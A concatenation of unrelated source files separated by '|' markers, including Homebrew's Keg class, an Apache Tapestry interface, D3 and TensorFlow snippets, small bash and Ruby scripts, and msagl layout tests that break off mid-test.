sql = "INSERT INTO orders (name, email, product_id, price) VALUES (%s, %s, %s, %s)"
engine.execute(sql, (name, email, product_id, price))
return render_template('purchase.html')
if __name__ == '__main__':
app.run(debug=True, port=5000) |
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package org.apache.tapestry5.ioc;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.util.Locale;
/**
* Represents a resource on the server that may be used for server side processing, or may be exposed to the client
* side. Generally, this represents an abstraction on top of files on the class path and files stored in the web
* application context.
*
* Resources are often used as map keys; they should be immutable and should implement hashCode() and equals().
*/
public interface Resource
{
/**
* Returns true if the resource exists; if a stream to the content of the file may be opened. A resource exists
* if {@link #toURL()} returns a non-null value. Starting in release 5.3.4, the result of this is cached.
*
* Starting in 5.4, some "virtual resources", may return true even though {@link #toURL()} returns null.
*
* @return true if the resource exists, false if it does not
*/
boolean exists();
/**
* Returns true if the resource is virtual, meaning this is no underlying file. Many operations are unsupported
* on virtual resources, including {@link #toURL()}, {@link #forLocale(java.util.Locale)},
* {@link #withExtension(String)}, {@link #getFile()}, {@link #getFolder()}, {@link #getPath()}}; these
* operations will throw an {@link java.lang.UnsupportedOperationException}.
*
* @since 5.4
*/
boolean isVirtual();
/**
* Opens a stream to the content of the resource, or returns null if the resource does not exist. The native
* input stream supplied by the resource is wrapped in a {@link java.io.BufferedInputStream}.
*
* @return an open, buffered stream to the content, if available
*/
InputStream openStream() throws IOException;
/**
* Returns the URL for the resource, or null if it does not exist. This value is lazily computed; starting in 5.3.4, subclasses may cache
* the result. Starting in 5.4, some "virtual resources" may return null.
*/
URL toURL();
/**
* Returns a localized version of the resource. May return null if no such resource exists. Starting in release
* 5.3.4, the result of this method is cached internally.
*/
Resource forLocale(Locale locale);
/**
* Returns a Resource based on a relative path, relative to the folder containing the resource. Understands the "."
* (current folder) and ".." (parent folder) conventions, and treats multiple sequential slashes as a single slash.
*
* Virtual resources (resources fabricated at runtime) return themselves.
*/
Resource forFile(String relativePath);
/**
* Returns a new Resource with the extension changed (or, if the resource does not have an extension, the extension
* is added). The new Resource may not exist (that is, {@link #toURL()} may return null.
*
* @param extension
* to apply to the resource, such as "html" or "properties"
* @return the new resource
*/
Resource withExtension(String extension);
/**
* Returns the portion of the path up to the last forward slash; this is the directory or folder portion of the
* Resource.
*/
String getFolder();
/**
* Returns the file portion of the Resource path, everything that follows the final forward slash.
*
* Starting in 5.4, certain kinds of "virtual resources" may return null here.
*/
String getFile();
/**
* Return the path (the combination of folder and file).
*
* Starting in 5.4, certain "virtual resources", may return an arbitrary value here.
*/
String getPath();
}
|
#!/bin/bash
##
## This script evaluate the insert size of the PE sequences by:
## 4. formatting the results
## Got the results:
##
echo '#LANE NUM_of_PAIRS MEAN MEDIAN SD' > 2.eva/res_ins.txt
cat $(ls 2.eva/*.eis) | grep -v '^#' >> 2.eva/res_ins.txt
##
## Got ALL the results:
##
## Remove the '_read' from the file:
sed -ri 's:_read::g' 2.eva/res_ins.txt
##
## Add the column to each line and save in another file
echo $(grep '#' res_ins.txt) MAX MIN > 2.eva/res_ins_fin.txt
grep -v '#' 2.eva/res_ins.txt | while read a b c d e; do echo "$a $b $c $d $e $(echo $c + 3*$e | bc) $(echo $c - 3*$e | bc)";done >> 2.eva/res_ins_fin.txt
##
## Now the results are in res_ins_fin.txt
|
<reponame>DistrictDataLabs/04-team1
var margin = {top: 20, right: 20, bottom: 30, left: 40},
width = 960 - margin.left - margin.right,
height = 500 - margin.top - margin.bottom;
// setup x
var xValue = function(d) { return d.Sentiment; console.log(d);}, // data -> value
xScale = d3.scale.linear().range([0, width]), // value -> display
xMap = function(d) { return xScale(xValue(d));}, // data -> display
xAxis = d3.svg.axis().scale(xScale).orient("bottom");
//var yValue = function(d) { return d.Sentences;}, // data -> value
//var yValue = function(d, i) { return i;}, // data -> value
var yValue = function(d) { return d.countIndex;}, // data -> value
yScale = d3.scale.linear().range([height, 0]), // value -> display
yMap = function(d) { return yScale(yValue(d));}, // data -> display
yAxis = d3.svg.axis().scale(yScale).orient("left");
// setup fill color
//var cValue = function(d) { return d.category;},
var color = d3.scale.category10();
// var color = d3.rgb("#ff9900"); // Pass in Hex
// var color = d3.rgb(12, 67, 199); // Red, Green, Blue
// var color = d3.hsl(0, chart5100, 50); // Hue-Saturation-Lightness (e.g. red)
// var color = d3.hcl(-97, 32, 52); // steelblue
// var color = d3.lab(52, -4, -32); // Lab color space (l, a, b); steelblue
// var color = d3.scale.ordinal()
// .range(colorbrewer.GnBu[9]);
// .range(["#FF0000", "#009933" , "#0000FF"]);
// .range(["#0000FF", "#009933" , "#FF0000"]);
// add the graph canvas to the body of the webpage
var chart5 = d3.select("body").append("svg")
.attr("width", width + margin.left + margin.right)
.attr("height", height + margin.top + margin.bottom)
.append("g")
.attr("transform", "translate(" + margin.left + "," + margin.top + ")");
// add the tooltip area to the webpage
var tooltip = d3.select("body").append("div")
.attr("class", "tooltip")
.style("opacity", 0);
// load data
d3.csv("js/stories_with_links_politics.csv", function(error, data) {
// change string (from CSV) into number format
data.forEach(function(d) {
d.Sentiment = +d.Sentiment;
d.countIndex = +d.countIndex;
//console.log(d);
//console.log(data);
});
// don't want dots overlapping axis, so add in buffer to data domain
xScale.domain([d3.min(data, xValue)-1, d3.max(data, xValue)+1]);
yScale.domain([d3.min(data, yValue)-1, d3.max(data, yValue)+1]);
// x-axis
chart5.append("g")
.attr("class", "x axis")
.attr("transform", "translate(0," + height + ")")
.call(xAxis)
.append("text")
.attr("class", "label")
.attr("x", width)
.attr("y", -6)
.style("text-anchor", "end")
.text("Sentiment Score");
// y-axis
chart5.append("g")
.attr("class", "y axis")
.call(yAxis)
.append("text")
.attr("class", "label")
.attr("transform", "rotate(-90)")
.attr("y", 6)
.attr("dy", ".71em")
.style("text-anchor", "end");
// .text("Number of Sentences");
// draw dots
chart5.selectAll(".dot")
.data(data)
.enter()
.append("a")
.attr("xlink:href", function(d) {return d.link})
.append("circle")
.attr("class", "dot")
.attr("r", 3.5)
.attr("cx", xMap)
.attr("cy", yMap)
// .style("fill", function(d) { return color(cValue(d));})
.style("fill", function(d) { return color(d.category);})
.on("mouseover", function(d) {
tooltip.transition()
.duration(200)
.style("opacity", .9);
tooltip.html(d.title + "<br/> (" + xValue(d) + " , " + d.date + ")")
.style("left", (d3.event.pageX + 5) + "px")
.style("top", (d3.event.pageY - 28) + "px");
})
.on("mouseout", function(d) {
tooltip.transition()
.duration(500)
.style("opacity", 0);
});
// draw legend
// var legend = chart5.selectAll(".legend")
// .data(color.domain())
// .enter().append("g")
// .attr("class", "legend")
// .attr("transform", function(d, i) { return "translate(0," + i * 20 + ")"; });
//
// // draw legend colored rectangles
// legend.append("rect")
// .attr("x", width - 18)
// .attr("width", 18)
// .attr("height", 18)
// .style("fill", color);
//
// // draw legend text
// legend.append("text")
// .attr("x", width - 24)
// .attr("y", 9)
// .attr("dy", ".35em")
// .style("text-anchor", "end")
// // .text(function(d) {return d;})
// .text("Politics")
});
|
<reponame>ideacrew/pa_edidb
carrier_ids = Carrier.where({
:abbrev => {"$ne" => "GHMSI"}
}).map(&:id)
puts carrier_ids
plan_ids = Plan.where(:carrier_id => {"$in" => carrier_ids}).map(&:id)
eligible_m_pols = pols = Policy.where({
:enrollees => {"$elemMatch" => {
:rel_code => "self",
:coverage_start => {"$gt" => Date.new(2016,12,31)}
}}, :employer_id => nil, :plan_id => {"$in" => plan_ids}}).no_timeout
eligible_pols = pols = Policy.where({
:enrollees => {"$elemMatch" => {
:rel_code => "self",
:coverage_start => {"$gt" => Date.new(2016,12,31)}
}}, :employer_id => nil, :plan_id => {"$in" => plan_ids}}).no_timeout
m_ids = []
eligible_pols.each do |pol|
if !pol.canceled?
pol.enrollees.each do |en|
m_ids << en.m_id
end
end
end
m_cache = Caches::MemberCache.new(m_ids)
Caches::MongoidCache.allocate(Plan)
Caches::MongoidCache.allocate(Carrier)
active_end = Date.new(2017,5,31)
eligible_pols.each do |pol|
begin
if !pol.canceled?
if !(pol.subscriber.coverage_start > active_end)
subscriber_id = pol.subscriber.m_id
subscriber_member = m_cache.lookup(subscriber_id)
auth_subscriber_id = subscriber_member.person.authority_member_id
if auth_subscriber_id == subscriber_id
enrollee_list = pol.enrollees.reject { |en| en.canceled? }
all_ids = enrollee_list.map(&:m_id) | [subscriber_id]
out_f = File.open(File.join("audits", "#{pol._id}_audit.xml"), 'w')
ser = CanonicalVocabulary::MaintenanceSerializer.new(
pol,
"audit",
"notification_only",
all_ids,
all_ids,
{ :term_boundry => active_end,
:member_repo => m_cache }
)
out_f.write(ser.serialize)
out_f.close
end
end
end
rescue Exception=>e
puts "#{pol._id} - #{e.inspect}"
next
end
end
|
#!/bin/bash
cd ~/Projects/chippyash/source/simple-accounts-3/
vendor/phpunit/phpunit/phpunit -c test/php/local-phpunit.xml --testdox-html contract.html test/php
tdconv -t "Simple Accounts V3" contract.html docs/Test-Contract.md
rm contract.html
|
library(ggplot2)
# load cars dataset
data <- read.table('cars.txt', header = TRUE)
# linear regression model
model <- lm(distance ~ speed, data = data)
# plot the model
ggplot(data, aes(x = speed, y = distance)) +
geom_point(colour = 'darkblue') +
geom_smooth(method = lm, se = FALSE, colour = 'red') |
<gh_stars>0
//
// JJShebeixiangqing2Cell.h
// shebeijiance
//
// Created by 杨剑 on 2019/3/28.
// Copyright © 2019 jjyangjian. All rights reserved.
//
#import <UIKit/UIKit.h>
NS_ASSUME_NONNULL_BEGIN
@interface JJShebeixiangqing2Cell : UITableViewCell
@end
NS_ASSUME_NONNULL_END
|
import tensorflow as tf
# Parameters
learning_rate = 0.001
epochs = 2000
batch_size = 100
# Placeholders
X = tf.placeholder(tf.float32, [None, n_features])
y = tf.placeholder(tf.float32, [None])
# Weights and bias
W = tf.Variable(tf.random_normal([n_features, 1]))
b = tf.Variable(tf.random_normal([1]))
# Model
y_pred = tf.add(tf.matmul(X, W), b)
# Loss and Optimizer
loss = tf.reduce_mean(tf.square(y - y_pred))
optimizer = tf.train.GradientDescentOptimizer(
learning_rate=learning_rate).minimize(loss)
# Initialize the variables
init = tf.global_variables_initializer()
# Run the model
with tf.Session() as sess:
sess.run(init)
for epoch in range(epochs):
for i in range(total_batch):
batch_x, batch_y = get_batch(batch_size)
sess.run(optimizer, feed_dict={X : batch_x, y : batch_y}) |
# /initialize.sh
if [ -d "/home/ubuntu/build" ]; then rm -Rf "/home/ubuntu/build"; fi |
<reponame>Louayarbash/saint-sauveur
# typed: false
# frozen_string_literal: true
require "keg_relocate"
require "language/python"
require "lock_file"
require "ostruct"
require "extend/cachable"
# Installation prefix of a formula.
#
# @api private
class Keg
extend T::Sig
extend Cachable
# Error for when a keg is already linked.
class AlreadyLinkedError < RuntimeError
def initialize(keg)
super <<~EOS
Cannot link #{keg.name}
Another version is already linked: #{keg.linked_keg_record.resolved_path}
EOS
end
end
# Error for when a keg cannot be linked.
class LinkError < RuntimeError
attr_reader :keg, :src, :dst
def initialize(keg, src, dst, cause)
@src = src
@dst = dst
@keg = keg
@cause = cause
super(cause.message)
set_backtrace(cause.backtrace)
end
end
# Error for when a file already exists or belongs to another keg.
class ConflictError < LinkError
extend T::Sig
sig { returns(String) }
def suggestion
conflict = Keg.for(dst)
rescue NotAKegError, Errno::ENOENT
"already exists. You may want to remove it:\n rm '#{dst}'\n"
else
<<~EOS
is a symlink belonging to #{conflict.name}. You can unlink it:
brew unlink #{conflict.name}
EOS
end
sig { returns(String) }
def to_s
s = []
s << "Could not symlink #{src}"
s << "Target #{dst}" << suggestion
s << <<~EOS
To force the link and overwrite all conflicting files:
brew link --overwrite #{keg.name}
To list all files that would be deleted:
brew link --overwrite --dry-run #{keg.name}
EOS
s.join("\n")
end
end
# Error for when a directory is not writable.
class DirectoryNotWritableError < LinkError
extend T::Sig
sig { returns(String) }
def to_s
<<~EOS
Could not symlink #{src}
#{dst.dirname} is not writable.
EOS
end
end
# Locale-specific directories have the form `language[_territory][.codeset][@modifier]`
LOCALEDIR_RX = %r{(locale|man)/([a-z]{2}|C|POSIX)(_[A-Z]{2})?(\.[a-zA-Z\-0-9]+(@.+)?)?}.freeze
INFOFILE_RX = %r{info/([^.].*?\.info|dir)$}.freeze
KEG_LINK_DIRECTORIES = %w[
bin etc include lib sbin share var
].freeze
MUST_EXIST_SUBDIRECTORIES = (
KEG_LINK_DIRECTORIES - %w[var] + %w[
opt
var/homebrew/linked
]
).map { |dir| HOMEBREW_PREFIX/dir }.sort.uniq.freeze
# Keep relatively in sync with
# {https://github.com/Homebrew/install/blob/HEAD/install.sh}
MUST_EXIST_DIRECTORIES = (MUST_EXIST_SUBDIRECTORIES + [
HOMEBREW_CELLAR,
].sort.uniq).freeze
MUST_BE_WRITABLE_DIRECTORIES = (
%w[
etc/bash_completion.d lib/pkgconfig
share/aclocal share/doc share/info share/locale share/man
share/man/man1 share/man/man2 share/man/man3 share/man/man4
share/man/man5 share/man/man6 share/man/man7 share/man/man8
share/zsh share/zsh/site-functions
var/log
].map { |dir| HOMEBREW_PREFIX/dir } + MUST_EXIST_SUBDIRECTORIES + [
HOMEBREW_CACHE,
HOMEBREW_CELLAR,
HOMEBREW_LOCKS,
HOMEBREW_LOGS,
HOMEBREW_REPOSITORY,
Language::Python.homebrew_site_packages,
]
).sort.uniq.freeze
# These paths relative to the keg's share directory should always be real
# directories in the prefix, never symlinks.
SHARE_PATHS = %w[
aclocal doc info java locale man
man/man1 man/man2 man/man3 man/man4
man/man5 man/man6 man/man7 man/man8
man/cat1 man/cat2 man/cat3 man/cat4
man/cat5 man/cat6 man/cat7 man/cat8
applications gnome gnome/help icons
mime-info pixmaps sounds postgresql
].freeze
ELISP_EXTENSIONS = %w[.el .elc].freeze
PYC_EXTENSIONS = %w[.pyc .pyo].freeze
LIBTOOL_EXTENSIONS = %w[.la .lai].freeze
# Given an array of kegs, this method will try to find some other kegs
# that depend on them. If it does, it returns:
#
# - some kegs in the passed array that have installed dependents
# - some installed dependents of those kegs.
#
# If it doesn't, it returns nil.
#
# Note that nil will be returned if the only installed dependents
# in the passed kegs are other kegs in the array.
#
# For efficiency, we don't bother trying to get complete data.
def self.find_some_installed_dependents(kegs)
keg_names = kegs.select(&:optlinked?).map(&:name)
keg_formulae = []
kegs_by_source = kegs.group_by do |keg|
# First, attempt to resolve the keg to a formula
# to get up-to-date name and tap information.
f = keg.to_formula
keg_formulae << f
[f.name, f.tap]
rescue
# If the formula for the keg can't be found,
# fall back to the information in the tab.
[keg.name, keg.tab.tap]
end
all_required_kegs = Set.new
all_dependents = []
# Don't include dependencies of kegs that were in the given array.
formulae_to_check = Formula.installed - keg_formulae
formulae_to_check.each do |dependent|
required = dependent.missing_dependencies(hide: keg_names)
required_kegs = required.map do |f|
f_kegs = kegs_by_source[[f.name, f.tap]]
next unless f_kegs
f_kegs.max_by(&:version)
end.compact
next if required_kegs.empty?
all_required_kegs += required_kegs
all_dependents << dependent.to_s
end
return if all_required_kegs.empty?
return if all_dependents.empty?
[all_required_kegs.to_a, all_dependents.sort]
end
# @param path if this is a file in a keg, returns the containing {Keg} object.
def self.for(path)
original_path = path
raise Errno::ENOENT, original_path.to_s unless original_path.exist?
if (path = original_path.realpath)
until path.root?
return Keg.new(path) if path.parent.parent == HOMEBREW_CELLAR.realpath
path = path.parent.realpath # realpath() prevents root? failing
end
end
raise NotAKegError, "#{original_path} is not inside a keg"
end
def self.all
Formula.racks.flat_map(&:subdirs).map { |d| new(d) }
end
attr_reader :path, :name, :linked_keg_record, :opt_record
protected :path
extend Forwardable
def_delegators :path,
:to_s, :hash, :abv, :disk_usage, :file_count, :directory?, :exist?, :/,
:join, :rename, :find
def initialize(path)
path = path.resolved_path if path.to_s.start_with?("#{HOMEBREW_PREFIX}/opt/")
raise "#{path} is not a valid keg" if path.parent.parent.realpath != HOMEBREW_CELLAR.realpath
raise "#{path} is not a directory" unless path.directory?
@path = path
@name = path.parent.basename.to_s
@linked_keg_record = HOMEBREW_LINKED_KEGS/name
@opt_record = HOMEBREW_PREFIX/"opt/#{name}"
@require_relocation = false
end
def rack
path.parent
end
alias to_path to_s
sig { returns(String) }
def inspect
"#<#{self.class.name}:#{path}>"
end
def ==(other)
instance_of?(other.class) && path == other.path
end
alias eql? ==
sig { returns(T::Boolean) }
def empty_installation?
Pathname.glob("#{path}/*") do |file|
return false if file.directory? && !file.children.reject(&:ds_store?).empty?
basename = file.basename.to_s
next if Metafiles.copy?(basename)
next if %w[.DS_Store INSTALL_RECEIPT.json].include?(basename)
return false
end
true
end
def require_relocation?
@require_relocation
end
def linked?
linked_keg_record.symlink? &&
linked_keg_record.directory? &&
path == linked_keg_record.resolved_path
end
def remove_linked_keg_record
linked_keg_record.unlink
linked_keg_record.parent.rmdir_if_possible
end
def optlinked?
opt_record.symlink? && path == opt_record.resolved_path
end
def remove_old_aliases
opt = opt_record.parent
linkedkegs = linked_keg_record.parent
tap = begin
to_formula.tap
rescue
# If the formula can't be found, just ignore aliases for now.
nil
end
if tap
bad_tap_opt = opt/tap.user
FileUtils.rm_rf bad_tap_opt if !bad_tap_opt.symlink? && bad_tap_opt.directory?
end
aliases.each do |a|
# versioned aliases are handled below
next if a.match?(/.+@./)
remove_alias_symlink(opt/a, opt_record)
remove_alias_symlink(linkedkegs/a, linked_keg_record)
end
Pathname.glob("#{opt_record}@*").each do |a|
a = a.basename.to_s
next if aliases.include?(a)
remove_alias_symlink(opt/a, rack)
remove_alias_symlink(linkedkegs/a, rack)
end
end
def remove_opt_record
opt_record.unlink
opt_record.parent.rmdir_if_possible
end
def uninstall(raise_failures: false)
CacheStoreDatabase.use(:linkage) do |db|
break unless db.created?
LinkageCacheStore.new(path, db).delete!
end
path.rmtree
path.parent.rmdir_if_possible
remove_opt_record if optlinked?
remove_linked_keg_record if linked?
remove_old_aliases
remove_oldname_opt_record
rescue Errno::EACCES, Errno::ENOTEMPTY
raise if raise_failures
odie <<~EOS
Could not remove #{name} keg! Do so manually:
sudo rm -rf #{path}
EOS
end
def unlink(verbose: false, dry_run: false)
ObserverPathnameExtension.reset_counts!
dirs = []
keg_directories = KEG_LINK_DIRECTORIES.map { |d| path/d }
.select(&:exist?)
keg_directories.each do |dir|
dir.find do |src|
dst = HOMEBREW_PREFIX + src.relative_path_from(path)
dst.extend(ObserverPathnameExtension)
dirs << dst if dst.directory? && !dst.symlink?
# check whether the file to be unlinked is from the current keg first
next unless dst.symlink?
next if src != dst.resolved_path
if dry_run
puts dst
Find.prune if src.directory?
next
end
dst.uninstall_info if dst.to_s.match?(INFOFILE_RX)
dst.unlink
Find.prune if src.directory?
end
end
unless dry_run
remove_old_aliases
remove_linked_keg_record if linked?
dirs.reverse_each(&:rmdir_if_possible)
end
ObserverPathnameExtension.n
end
def lock(&block)
FormulaLock.new(name).with_lock do
if oldname_opt_record
FormulaLock.new(oldname_opt_record.basename.to_s).with_lock(&block)
else
yield
end
end
end
def completion_installed?(shell)
dir = case shell
when :bash then path/"etc/bash_completion.d"
when :zsh
dir = path/"share/zsh/site-functions"
dir if dir.directory? && dir.children.any? { |f| f.basename.to_s.start_with?("_") }
when :fish then path/"share/fish/vendor_completions.d"
end
dir&.directory? && !dir.children.empty?
end
def functions_installed?(shell)
case shell
when :fish
dir = path/"share/fish/vendor_functions.d"
dir.directory? && !dir.children.empty?
when :zsh
# Check for non completion functions (i.e. files not started with an underscore),
# since those can be checked separately
dir = path/"share/zsh/site-functions"
dir.directory? && dir.children.any? { |f| !f.basename.to_s.start_with?("_") }
end
end
sig { returns(T::Boolean) }
def plist_installed?
!Dir["#{path}/*.plist"].empty?
end
def python_site_packages_installed?
(path/"lib/python2.7/site-packages").directory?
end
sig { returns(T::Boolean) }
def python_pth_files_installed?
!Dir["#{path}/lib/python2.7/site-packages/*.pth"].empty?
end
sig { returns(T::Array[Pathname]) }
def apps
app_prefix = optlinked? ? opt_record : path
Pathname.glob("#{app_prefix}/{,libexec/}*.app")
end
def elisp_installed?
return false unless (path/"share/emacs/site-lisp"/name).exist?
(path/"share/emacs/site-lisp"/name).children.any? { |f| ELISP_EXTENSIONS.include? f.extname }
end
def version
require "pkg_version"
PkgVersion.parse(path.basename.to_s)
end
def to_formula
Formulary.from_keg(self)
end
def oldname_opt_record
@oldname_opt_record ||= if (opt_dir = HOMEBREW_PREFIX/"opt").directory?
opt_dir.subdirs.find do |dir|
dir.symlink? && dir != opt_record && path.parent == dir.resolved_path.parent
end
end
end
def link(verbose: false, dry_run: false, overwrite: false)
raise AlreadyLinkedError, self if linked_keg_record.directory?
ObserverPathnameExtension.reset_counts!
optlink(verbose: verbose, dry_run: dry_run, overwrite: overwrite) unless dry_run
# yeah indeed, you have to force anything you need in the main tree into
# these dirs REMEMBER that *NOT* everything needs to be in the main tree
link_dir("etc", verbose: verbose, dry_run: dry_run, overwrite: overwrite) { :mkpath }
link_dir("bin", verbose: verbose, dry_run: dry_run, overwrite: overwrite) { :skip_dir }
link_dir("sbin", verbose: verbose, dry_run: dry_run, overwrite: overwrite) { :skip_dir }
link_dir("include", verbose: verbose, dry_run: dry_run, overwrite: overwrite) { :link }
link_dir("share", verbose: verbose, dry_run: dry_run, overwrite: overwrite) do |relative_path|
case relative_path.to_s
when INFOFILE_RX then :info
when "locale/locale.alias",
%r{^icons/.*/icon-theme\.cache$}
:skip_file
when LOCALEDIR_RX,
%r{^icons/}, # all icons subfolders should also mkpath
/^zsh/,
/^fish/,
%r{^lua/}, # Lua, Lua51, Lua53 all need the same handling.
%r{^guile/},
*SHARE_PATHS
:mkpath
else
:link
end
end
link_dir("lib", verbose: verbose, dry_run: dry_run, overwrite: overwrite) do |relative_path|
case relative_path.to_s
when "charset.alias"
:skip_file
when "pkgconfig", # pkg-config database gets explicitly created
"cmake", # cmake database gets explicitly created
"dtrace", # lib/language folders also get explicitly created
/^gdk-pixbuf/,
"ghc",
/^gio/,
"lua",
/^mecab/,
/^node/,
/^ocaml/,
/^perl5/,
"php",
/^python[23]\.\d/,
/^R/,
/^ruby/
:mkpath
else
# Everything else is symlinked to the cellar
:link
end
end
link_dir("Frameworks", verbose: verbose, dry_run: dry_run, overwrite: overwrite) do |relative_path|
# Frameworks contain symlinks pointing into a subdir, so we have to use
# the :link strategy. However, for Foo.framework and
# Foo.framework/Versions we have to use :mkpath so that multiple formulae
# can link their versions into it and `brew [un]link` works.
if relative_path.to_s.match?(%r{[^/]*\.framework(/Versions)?$})
:mkpath
else
:link
end
end
unless dry_run
make_relative_symlink(linked_keg_record, path, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
end
rescue LinkError
unlink(verbose: verbose)
raise
else
ObserverPathnameExtension.n
end
def remove_oldname_opt_record
return unless oldname_opt_record
return if oldname_opt_record.resolved_path != path
@oldname_opt_record.unlink
@oldname_opt_record.parent.rmdir_if_possible
@oldname_opt_record = nil
end
def tab
Tab.for_keg(self)
end
def runtime_dependencies
Keg.cache[:runtime_dependencies] ||= {}
Keg.cache[:runtime_dependencies][path] ||= tab.runtime_dependencies
end
def aliases
tab.aliases || []
end
def optlink(verbose: false, dry_run: false, overwrite: false)
opt_record.delete if opt_record.symlink? || opt_record.exist?
make_relative_symlink(opt_record, path, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
aliases.each do |a|
alias_opt_record = opt_record.parent/a
alias_opt_record.delete if alias_opt_record.symlink? || alias_opt_record.exist?
make_relative_symlink(alias_opt_record, path, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
end
return unless oldname_opt_record
oldname_opt_record.delete
make_relative_symlink(oldname_opt_record, path, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
end
def delete_pyc_files!
find { |pn| pn.delete if PYC_EXTENSIONS.include?(pn.extname) }
find { |pn| FileUtils.rm_rf pn if pn.basename.to_s == "__pycache__" }
end
private
def resolve_any_conflicts(dst, dry_run: false, verbose: false, overwrite: false)
return unless dst.symlink?
src = dst.resolved_path
# src itself may be a symlink, so check lstat to ensure we are dealing with
# a directory, and not a symlink pointing at a directory (which needs to be
# treated as a file). In other words, we only want to resolve one symlink.
begin
stat = src.lstat
rescue Errno::ENOENT
# dst is a broken symlink, so remove it.
dst.unlink unless dry_run
return
end
return unless stat.directory?
begin
keg = Keg.for(src)
rescue NotAKegError
puts "Won't resolve conflicts for symlink #{dst} as it doesn't resolve into the Cellar." if verbose
return
end
dst.unlink unless dry_run
keg.link_dir(src, dry_run: false, verbose: false, overwrite: false) { :mkpath }
true
end
def make_relative_symlink(dst, src, verbose: false, dry_run: false, overwrite: false)
if dst.symlink? && src == dst.resolved_path
puts "Skipping; link already exists: #{dst}" if verbose
return
end
# cf. git-clean -n: list files to delete, don't really link or delete
if dry_run && overwrite
if dst.symlink?
puts "#{dst} -> #{dst.resolved_path}"
elsif dst.exist?
puts dst
end
return
end
# list all link targets
if dry_run
puts dst
return
end
dst.delete if overwrite && (dst.exist? || dst.symlink?)
dst.make_relative_symlink(src)
rescue Errno::EEXIST => e
raise ConflictError.new(self, src.relative_path_from(path), dst, e) if dst.exist?
if dst.symlink?
dst.unlink
retry
end
rescue Errno::EACCES => e
raise DirectoryNotWritableError.new(self, src.relative_path_from(path), dst, e)
rescue SystemCallError => e
raise LinkError.new(self, src.relative_path_from(path), dst, e)
end
def remove_alias_symlink(alias_symlink, alias_match_path)
if alias_symlink.symlink? && alias_symlink.exist?
alias_symlink.delete if alias_match_path.exist? && alias_symlink.realpath == alias_match_path.realpath
elsif alias_symlink.symlink? || alias_symlink.exist?
alias_symlink.delete
end
end
protected
# symlinks the contents of path+relative_dir recursively into #{HOMEBREW_PREFIX}/relative_dir
def link_dir(relative_dir, verbose: false, dry_run: false, overwrite: false)
root = path/relative_dir
return unless root.exist?
root.find do |src|
next if src == root
dst = HOMEBREW_PREFIX + src.relative_path_from(path)
dst.extend ObserverPathnameExtension
if src.symlink? || src.file?
Find.prune if File.basename(src) == ".DS_Store"
Find.prune if src.resolved_path == dst
# Don't link pyc or pyo files because Python overwrites these
# cached object files and next time brew wants to link, the
# file is in the way.
Find.prune if PYC_EXTENSIONS.include?(src.extname) && src.to_s.include?("/site-packages/")
case yield src.relative_path_from(root)
when :skip_file, nil
Find.prune
when :info
next if File.basename(src) == "dir" # skip historical local 'dir' files
make_relative_symlink dst, src, verbose: verbose, dry_run: dry_run, overwrite: overwrite
dst.install_info
else
make_relative_symlink dst, src, verbose: verbose, dry_run: dry_run, overwrite: overwrite
end
elsif src.directory?
# if the dst dir already exists, then great! walk the rest of the tree tho
next if dst.directory? && !dst.symlink?
# no need to put .app bundles in the path, the user can just use
# spotlight, or the open command and actual mac apps use an equivalent
Find.prune if src.extname == ".app"
case yield src.relative_path_from(root)
when :skip_dir
Find.prune
when :mkpath
dst.mkpath unless resolve_any_conflicts(dst, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
else
unless resolve_any_conflicts(dst, verbose: verbose, dry_run: dry_run, overwrite: overwrite)
make_relative_symlink dst, src, verbose: verbose, dry_run: dry_run, overwrite: overwrite
Find.prune
end
end
end
end
end
end
require "extend/os/keg"
|
<reponame>msaglJS/msagl-js
import {GeomGraph} from '../../../src'
import {GeomObject} from '../../../src/layout/core/geomObject'
import {SvgDebugWriter} from '../../utils/svgDebugWriter'
import {runMDSLayout, outputGraph} from '../../utils/testUtils'
import {sortedList} from '../sortedBySizeListOfgvFiles'
import {join} from 'path'
import {DrawingGraph} from '../../../drawing/drawingGraph'
test('graph with subgraphs', () => {
const dg = runMDSLayout('test/data/graphvis/clust.gv')
outputGraph(<GeomGraph>GeomObject.getGeom(dg.graph), 'clustMDS')
})
xtest('b7 pivot mds', () => {
const dg = runMDSLayout('test/data/graphvis/b7.gv')
outputGraph(<GeomGraph>GeomObject.getGeom(dg.graph), 'b7Mds.svg')
})
test('layout 0-50 gv files with MDS', () => {
const path = 'test/data/graphvis/'
let i = 0
for (const f of sortedList) {
if (f.match('big(.*).gv')) continue // the parser bug
if (++i > 50) return
let dg: DrawingGraph
try {
dg = runMDSLayout(join(path, f))
} catch (Error) {
console.log('i = ' + i + ', ' + f + ' error:' + Error.message)
expect(1).toBe(0)
}
if (dg != null) {
const t: SvgDebugWriter = new SvgDebugWriter('/tmp/pivot' + f + '.svg')
t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
}
}
})
test('layout 50-100 gv files with MDS', () => {
const path = 'test/data/graphvis/'
let i = 0
for (const f of sortedList) {
if (f.match('big(.*).gv')) continue // the parser bug
if (++i > 100) return
if (i < 50) continue
let dg: DrawingGraph
try {
dg = runMDSLayout(join(path, f))
} catch (Error) {
console.log(f + ' error:' + Error.message)
expect(1).toBe(0)
}
if (dg != null) {
const t: SvgDebugWriter = new SvgDebugWriter('/tmp/pivot' + f + '.svg')
t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
}
}
})
xtest('layout 100-150 gv files with MDS', () => {
const path = 'test/data/graphvis/'
let i = 0
for (const f of sortedList) {
if (f.match('big(.*).gv')) continue // the parser bug
if (++i > 150) return
if (i < 100) continue
let dg: DrawingGraph
try {
dg = runMDSLayout(join(path, f))
} catch (Error) {
console.log(f + ' error:' + Error.message)
expect(1).toBe(0)
}
if (dg != null) {
const t: SvgDebugWriter = new SvgDebugWriter('/tmp/pivot' + f + '.svg')
t.writeGeomGraph(GeomObject.getGeom(dg.graph) as GeomGraph)
}
}
})
xtest('layout 150-200 gv files with MDS', () => {
